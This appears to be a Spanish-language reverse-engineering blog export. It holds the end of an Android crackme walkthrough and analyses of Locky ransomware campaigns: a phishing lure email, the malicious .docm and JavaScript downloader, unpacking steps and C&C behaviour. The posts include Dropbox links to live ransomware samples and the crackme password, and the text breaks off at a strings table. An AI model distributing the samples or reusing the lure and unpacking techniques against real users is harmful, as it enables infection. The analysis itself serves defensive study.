<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRtyD4mkXbeDYr4owxJkMfeetOW7HAYnwuF1jO9E2LzSPRFauK24wMJqClN1hM5NjpRLrM-dKT48_eWfPP2ns27TAc95wNWH9h2fjlePM67Zx9tKGl3gWS2UCIO5F5FORAvDxQq74eJNw/s1600/000.jpg" imageanchor="1" style="font-family: "Times New Roman"; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRtyD4mkXbeDYr4owxJkMfeetOW7HAYnwuF1jO9E2LzSPRFauK24wMJqClN1hM5NjpRLrM-dKT48_eWfPP2ns27TAc95wNWH9h2fjlePM67Zx9tKGl3gWS2UCIO5F5FORAvDxQq74eJNw/s640/000.jpg" width="640" /></a></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Luego firmamos el APK con </span><span style="font-family: "arial" , "helvetica" , sans-serif;">signapk.jar</span></b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">set usrc=0</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">set heapy=512</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">echo Signing Apk</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">java -Xmx%heapy%m -jar signapk.jar -w testkey.x509.pem testkey.pk8 in.apk out.apk</span><br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<b>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br />Instalamos y ejecutamos el APK.</span></b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Y vemos que ya paso de largo las comprobaciones y nos muestra el ingreso de la password.</span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8cEGWR4ion6M7hqJpmF4WSAzm3FTs3FtWidS5ZKDrCLwhmBKdgjkb5MYo4MoT7tc8hyphenhyphenLbkohX0jlnQiDsTRgCVUZDbtQMvAOfTGvepzRcTg4ORoEpvWZIMhHVfKoAMtmWdRnefkxS58/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8cEGWR4ion6M7hqJpmF4WSAzm3FTs3FtWidS5ZKDrCLwhmBKdgjkb5MYo4MoT7tc8hyphenhyphenLbkohX0jlnQiDsTRgCVUZDbtQMvAOfTGvepzRcTg4ORoEpvWZIMhHVfKoAMtmWdRnefkxS58/s640/01.jpg" width="364" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Ingresamos la password </span><b style="font-family: Arial, Helvetica, sans-serif;">3gg535</b><span style="font-family: "arial" , "helvetica" , sans-serif;"> y se descifra el recurso enc.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_YMROwtLaBlqFaKVqersBTWm3FtPPWGf4yfrdxT-csovtDnvDcj3qt9EKF7kosXYXnrVnesZ00uBeWvgez4RiJJCq-L4TYh5JpkTYAaqa9ROoRKDkAhMymvyX3Ya6iRMybVjL9ByZu5M/s1600/01b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_YMROwtLaBlqFaKVqersBTWm3FtPPWGf4yfrdxT-csovtDnvDcj3qt9EKF7kosXYXnrVnesZ00uBeWvgez4RiJJCq-L4TYh5JpkTYAaqa9ROoRKDkAhMymvyX3Ya6iRMybVjL9ByZu5M/s640/01b.jpg" width="361" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXgHQNUlWRrg8zX8xVV8JzAVKGMZXs850FplCa5iASfrq-qmKFzx7IwQxHgVBrt7e0rHUp2JwWljWwPCVm8lBLi1SdG9xr1UY8rmPwCQi9LjAg3MR4HVS3Pr0c5i961L4TTPVsL79T1wQ/s1600/01c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXgHQNUlWRrg8zX8xVV8JzAVKGMZXs850FplCa5iASfrq-qmKFzx7IwQxHgVBrt7e0rHUp2JwWljWwPCVm8lBLi1SdG9xr1UY8rmPwCQi9LjAg3MR4HVS3Pr0c5i961L4TTPVsL79T1wQ/s640/01c.jpg" width="356" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Para luego solicitar ser instalado.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnbilznye2oYc43_iN9nynrEQqbuyHxqZ12aaOv2pWYxOfNiPy6aJvMmTCtqEP33tL8bjwYOryptaNJIk_qih_rNgAe9OZGqQI64FMU7HfvM312_ZRXe1teIn9XgDC5Pzy1ZhLT1xzARY/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnbilznye2oYc43_iN9nynrEQqbuyHxqZ12aaOv2pWYxOfNiPy6aJvMmTCtqEP33tL8bjwYOryptaNJIk_qih_rNgAe9OZGqQI64FMU7HfvM312_ZRXe1teIn9XgDC5Pzy1ZhLT1xzARY/s640/02.jpg" width="382" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif;">Instalamos y ejecutamos.... pero lo vemos la próxima.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Les dejo el apk original, el apk parchado y los .SMALI para que pueda hacerlo </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Uds. en sus casas.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://dl.dropboxusercontent.com/u/80008916/CrackMeBabe.7z</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Próxima entrega antes de fin de año :D</span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: #fefdfa; color: #333333;">Eso es todo por el momento @Dkavalanche 2016 </span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<br />
<br />
<br />
<br />
<br />
<br />@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-17133376332467427442016-05-04T10:14:00.000-07:002016-05-04T10:14:10.584-07:00<b style="background-color: white; color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;">Campaña de Ransomware: Locky - Parte III</b><br style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2px;" /><b style="background-color: white; color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></b><span style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2px;"></span><span style="background-color: white;"><span style="color: #222222; font-family: arial, helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;">Nueva campaña, esta vez se utiliza un documento .docm que es un Documento Microsoft Word con macros.</span></span></span><br />
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><span style="line-height: 18.2px;"><br /></span></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><span style="line-height: 18.2px;"><br /></span></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><span style="line-height: 18.2px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaqc3QBemJalJlVCCAN5Ax0oW4GQ0erx44Oo4zpV-Au-rzl7UU33-aGu6GhgsTe61NPqyNQwqWpX6TN2VNKL90JyLOkoEWPU7jKEK9_NcWdz9tTXQKsfccOz3qSg4lnfYpcnDcahLvyXk/s1600/fake.jpg" imageanchor="1"><img border="0" height="562" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaqc3QBemJalJlVCCAN5Ax0oW4GQ0erx44Oo4zpV-Au-rzl7UU33-aGu6GhgsTe61NPqyNQwqWpX6TN2VNKL90JyLOkoEWPU7jKEK9_NcWdz9tTXQKsfccOz3qSg4lnfYpcnDcahLvyXk/s640/fake.jpg" width="640" /></a></span></span><br />
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></span>
<span style="color: #222222; font-family: arial, helvetica, sans-serif;"><span style="background-color: white; font-size: 13px; line-height: 18.2px;">El Indice de detecciones del documento es muy baja.</span></span><br />
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: arial, helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7UvbA6uJsr39437y5YAvcxXI4TCShFtfyNFViD-8XZS9T5isTBdqVWJLa3Crc4FVU3T7B3KByOeaWHNJcflYEsnu8KQ5HOFBA1zt0cXlLPl5ozW1QJMuWpBkhZPLZuiTezbgLudS1Ib4/s1600/vt.jpg" imageanchor="1"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7UvbA6uJsr39437y5YAvcxXI4TCShFtfyNFViD-8XZS9T5isTBdqVWJLa3Crc4FVU3T7B3KByOeaWHNJcflYEsnu8KQ5HOFBA1zt0cXlLPl5ozW1QJMuWpBkhZPLZuiTezbgLudS1Ib4/s640/vt.jpg" width="640" /></a></span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Al habilitar las macros en el docm, se produce la descarga e infección de la computadora.</span><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha7sQGmYaG74Lo2owtphD8Ezeu_nx2yNnrJVCGrcbTe11jtjQcBBJIYk1eyhDqLv6gvf95KGuk16C6oNYweQeGwK783wt6wfD3RkTO8EpXtMFTE12KLx685Pe-Qz7Iunsjgr4x_eY18ng/s1600/01.jpg" imageanchor="1"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha7sQGmYaG74Lo2owtphD8Ezeu_nx2yNnrJVCGrcbTe11jtjQcBBJIYk1eyhDqLv6gvf95KGuk16C6oNYweQeGwK783wt6wfD3RkTO8EpXtMFTE12KLx685Pe-Qz7Iunsjgr4x_eY18ng/s640/01.jpg" width="640" /></a><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Desempaquetado de la capa de ofuscación (crypter del binario)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">https://virustotal.com/es/file/ed8390885a6bcdda11cb51f8d3c2553625d1c567f221a490450f44d2ac3cec3a/analysis/</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">BP en IsDebuggerPresent /ResumeThread/WriteProcessMemory y luego dumpear con Pe-TOOL</span><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh27AupXeW2jHdIJZxxlfg_a0LfKnwqnQ35ue8XFjh8BhZQsQXugbxS3VZsL3f3h16GgVNra8F7WNpqr1iA26FE02LuiyM8qedmdTLC74zoSsRUJ7VMMUN0_-Xf60F2Q-luur7h9lvh25E/s1600/02.jpg" imageanchor="1"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh27AupXeW2jHdIJZxxlfg_a0LfKnwqnQ35ue8XFjh8BhZQsQXugbxS3VZsL3f3h16GgVNra8F7WNpqr1iA26FE02LuiyM8qedmdTLC74zoSsRUJ7VMMUN0_-Xf60F2Q-luur7h9lvh25E/s640/02.jpg" width="640" /></a><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Locky...</span><br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIpWuqbWQSo8ewOXsc3q8ROwUCYEq459NO_I0FiuWQ4NIRQ5UQcLdHbLsC7WnZ9BBnQUCTUKpb-suEkQBeB2gelGScF1YB09AZt-MnHqlmRU4EF1LxjEVbiPYGcqxHTpVwxohVLkyZZYc/s1600/locky.jpg" imageanchor="1"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIpWuqbWQSo8ewOXsc3q8ROwUCYEq459NO_I0FiuWQ4NIRQ5UQcLdHbLsC7WnZ9BBnQUCTUKpb-suEkQBeB2gelGScF1YB09AZt-MnHqlmRU4EF1LxjEVbiPYGcqxHTpVwxohVLkyZZYc/s640/locky.jpg" width="640" /></a><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Exenciones de archivo que busca para cifrar.</span><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8y1o6QviH8ma2R0B3O05rSVzPBgYZy9x0zcgZniZcEYXIPWCHshjsBm33pMjMQJbBzTuJHGB1zp1sYa15RBy1HPJ18arItDcG97e654Ad_FHlBKfn5XRvgz9AkzzeN_92do5Evxk8at4/s1600/03.jpg" imageanchor="1"><img border="0" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8y1o6QviH8ma2R0B3O05rSVzPBgYZy9x0zcgZniZcEYXIPWCHshjsBm33pMjMQJbBzTuJHGB1zp1sYa15RBy1HPJ18arItDcG97e654Ad_FHlBKfn5XRvgz9AkzzeN_92do5Evxk8at4/s640/03.jpg" width="640" /></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Probando el binario en forma dinámica.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Conexión con el C&C, eh visto que si no hay conexión a Internet o no puede encontrar vía dns los sitios de C&C, Locky no comienza con el proceso de cifrado de la PC.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjztvcARr0azDo7qrSFEKgFXEGh9bfARxwLQhv2xq1UMXkNGp78wYkVtjIAofJw6bsZ5_5UfngsldZDEenNtUQpO4PXqNivX7IHe1VHUhyIFngFcbM-Ba-3XIR9U4RXJ8mci126nXbxLU4/s1600/05.jpg" imageanchor="1"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjztvcARr0azDo7qrSFEKgFXEGh9bfARxwLQhv2xq1UMXkNGp78wYkVtjIAofJw6bsZ5_5UfngsldZDEenNtUQpO4PXqNivX7IHe1VHUhyIFngFcbM-Ba-3XIR9U4RXJ8mci126nXbxLU4/s640/05.jpg" width="640" /></a><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">El infame cartel de que nuestros datos fueron cifrados.</span><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDLgkRjwvPrB6bR0A7RUDTciKWfuMlj80f8mtc9zBK_OJI4qtlOZCNh2zXYcifWmlTNS0No2YBo1kf5blsJVUiJxBIa0mmVP2fVlIbcde08st7H3nJ6DrSUwxpwaSMKPm5P_39qwT6YB8/s1600/04.jpg" imageanchor="1"><img border="0" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDLgkRjwvPrB6bR0A7RUDTciKWfuMlj80f8mtc9zBK_OJI4qtlOZCNh2zXYcifWmlTNS0No2YBo1kf5blsJVUiJxBIa0mmVP2fVlIbcde08st7H3nJ6DrSUwxpwaSMKPm5P_39qwT6YB8/s640/04.jpg" width="640" /></a><br />
<br />
<br />
<br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Muestras: https://www.dropbox.com/s/105s5umnmpm8cj8/Locky-03-05-16.zip?dl=0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Eso es todo por el momento @Dkavalanche 2016</span><br />
<br />
<br />@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-38845094925562505722016-03-10T06:49:00.002-08:002016-03-11T15:34:10.009-08:00<b style="color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;">Campaña de Ransomware: Locky - Parte II</b><br />
<b style="color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><br /></b>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px; line-height: 18.2px;">Continúan con las campañas de infección en forma masiva, esta vez el Ransomware se encuentra alojado en un servidor nacional demostrando que esta amenaza llego para quedarse y atacar a usuarios de Argentina.</span></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><br /></span></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px; line-height: 18.2px;">Asunto: : Shipping Information - Your Order #396-7972</span></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><br /></span></span>
<br />
<div class="MsoPlainText">
<span style="font-family: "courier new" , "courier" , monospace;"><i>Dear Customer,<o:p></o:p></i></span></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
<span style="font-family: "courier new" , "courier" , monospace;"><i>Your order will be shipped shortly, we apologize for the
troubles. Please, review the invoice in the attached file.<o:p></o:p></i></span></div>
<div class="MsoPlainText">
<br /></div>
<br />
<div class="MsoPlainText">
<span style="font-family: "courier new" , "courier" , monospace;"><i>Sincerely,<o:p></o:p></i></span></div>
<div class="MsoPlainText">
<span style="font-family: "courier new" , "courier" , monospace;"><i><br /></i></span></div>
<div class="MsoPlainText">
<span style="font-family: "courier new" , "courier" , monospace;"><i>Xxxxx..</i></span></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
<br /></div>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlLnVNRVNTR9d8jA88TncCcLaEiwT-RgYEV-UixZUdv6Ny9t8Lka0TXKJFqxAUWjY6KlqetvH1abR07yQn3WnoRfQWspEb3dlnop4MnEn_8lF84y5LSYm4vv1dGUcf869_WrKmNDuQYN0/s1600/fake2.jpg" imageanchor="1"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlLnVNRVNTR9d8jA88TncCcLaEiwT-RgYEV-UixZUdv6Ny9t8Lka0TXKJFqxAUWjY6KlqetvH1abR07yQn3WnoRfQWspEb3dlnop4MnEn_8lF84y5LSYm4vv1dGUcf869_WrKmNDuQYN0/s640/fake2.jpg" width="640" /></a></span></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">JavaScript downloader ofuscado dentro de un archivo .zip</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwi1JzOf3NlqmskNDspCyLMUybvtKfifBWgMNCQ2yt5Eoc592AeJCEqMNwsVYusGrV-2Z-1S70r-d7nbOLXz9S7WnK4b5oI_zSn2p5j0GyBcASPgXw0I22ZE1ufzN8M2PKop7-wavZS3Q/s1600/javascript.jpg" imageanchor="1"><img border="0" height="14" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwi1JzOf3NlqmskNDspCyLMUybvtKfifBWgMNCQ2yt5Eoc592AeJCEqMNwsVYusGrV-2Z-1S70r-d7nbOLXz9S7WnK4b5oI_zSn2p5j0GyBcASPgXw0I22ZE1ufzN8M2PKop7-wavZS3Q/s640/javascript.jpg" width="640" /></a></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvFeyZaA7K73vxkYtzsXRnFznodEwMwezKILytcV4T85DwS6YTwL__-K11M1-1J8cmx9JfSTNLvaLJUYEOTtYLwGDdKuLOHZqM2hIOCQu37QF4jfDuTkKM7USVrajxhaw7v8IzSKcHNj0/s1600/001.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvFeyZaA7K73vxkYtzsXRnFznodEwMwezKILytcV4T85DwS6YTwL__-K11M1-1J8cmx9JfSTNLvaLJUYEOTtYLwGDdKuLOHZqM2hIOCQu37QF4jfDuTkKM7USVrajxhaw7v8IzSKcHNj0/s1600/001.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvFeyZaA7K73vxkYtzsXRnFznodEwMwezKILytcV4T85DwS6YTwL__-K11M1-1J8cmx9JfSTNLvaLJUYEOTtYLwGDdKuLOHZqM2hIOCQu37QF4jfDuTkKM7USVrajxhaw7v8IzSKcHNj0/s1600/001.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvFeyZaA7K73vxkYtzsXRnFznodEwMwezKILytcV4T85DwS6YTwL__-K11M1-1J8cmx9JfSTNLvaLJUYEOTtYLwGDdKuLOHZqM2hIOCQu37QF4jfDuTkKM7USVrajxhaw7v8IzSKcHNj0/s640/001.jpg" width="640" /></a><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">Trafico de red de la descarga.</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span><span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">Icono del malware Descargado</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu6u6OESemLML00iiTwR-sCEMBLAIXIwRCW1-80v9x8_K4BzrU15W8fiGMYTZ9UjhHtLnywbXkRwTjb-JcIZEl2H5iyUanYP-Jjy_c7aSH33ePZQ_L9RIV-O_kFgW9hCuuqlSdz_dFK1A/s1600/icono.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu6u6OESemLML00iiTwR-sCEMBLAIXIwRCW1-80v9x8_K4BzrU15W8fiGMYTZ9UjhHtLnywbXkRwTjb-JcIZEl2H5iyUanYP-Jjy_c7aSH33ePZQ_L9RIV-O_kFgW9hCuuqlSdz_dFK1A/s400/icono.jpg" /></a></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">Baja detección por parte de los Antivirus.</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1eOyv8TUlZSy3oABMwR5HwEqEZaSSJ4asSrmVx2BFmPNuchSYwKRVRXt2xXu2AS5FOh8ZFUVxcoqt2qYZhrpT_3PXd4B4R2CD6MbJwKCHY-r-M9tcwu8QuZ4uFN5fwUVdOxl14LzfqBY/s1600/VT.jpg" imageanchor="1"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1eOyv8TUlZSy3oABMwR5HwEqEZaSSJ4asSrmVx2BFmPNuchSYwKRVRXt2xXu2AS5FOh8ZFUVxcoqt2qYZhrpT_3PXd4B4R2CD6MbJwKCHY-r-M9tcwu8QuZ4uFN5fwUVdOxl14LzfqBY/s640/VT.jpg" width="640" /></a></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">El binario tiene una capa de Cripter igual al caso anterior, con un Bp en ResumeThread y dumpeando con PEtools obtenemos la muestra limpia.</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_lEotSfQEwFMFLAYJ84wxwky0L5wwDDS48BE539bCmk_nSUoDTGDBdu9PWS26Rzttcc_NCBL3FfQ55HN0zHLKJpO6UfkpbzRmgiqULOARzcOLH1_0Ij5R5VL_EkMSD6SAtfUwDvgLZ1E/s1600/dump.jpg" imageanchor="1"><img border="0" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_lEotSfQEwFMFLAYJ84wxwky0L5wwDDS48BE539bCmk_nSUoDTGDBdu9PWS26Rzttcc_NCBL3FfQ55HN0zHLKJpO6UfkpbzRmgiqULOARzcOLH1_0Ij5R5VL_EkMSD6SAtfUwDvgLZ1E/s640/dump.jpg" width="640" /></a></span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">Strings</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Text strings referenced in Dumped:.text</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Address Disassembly Text string</span><br />
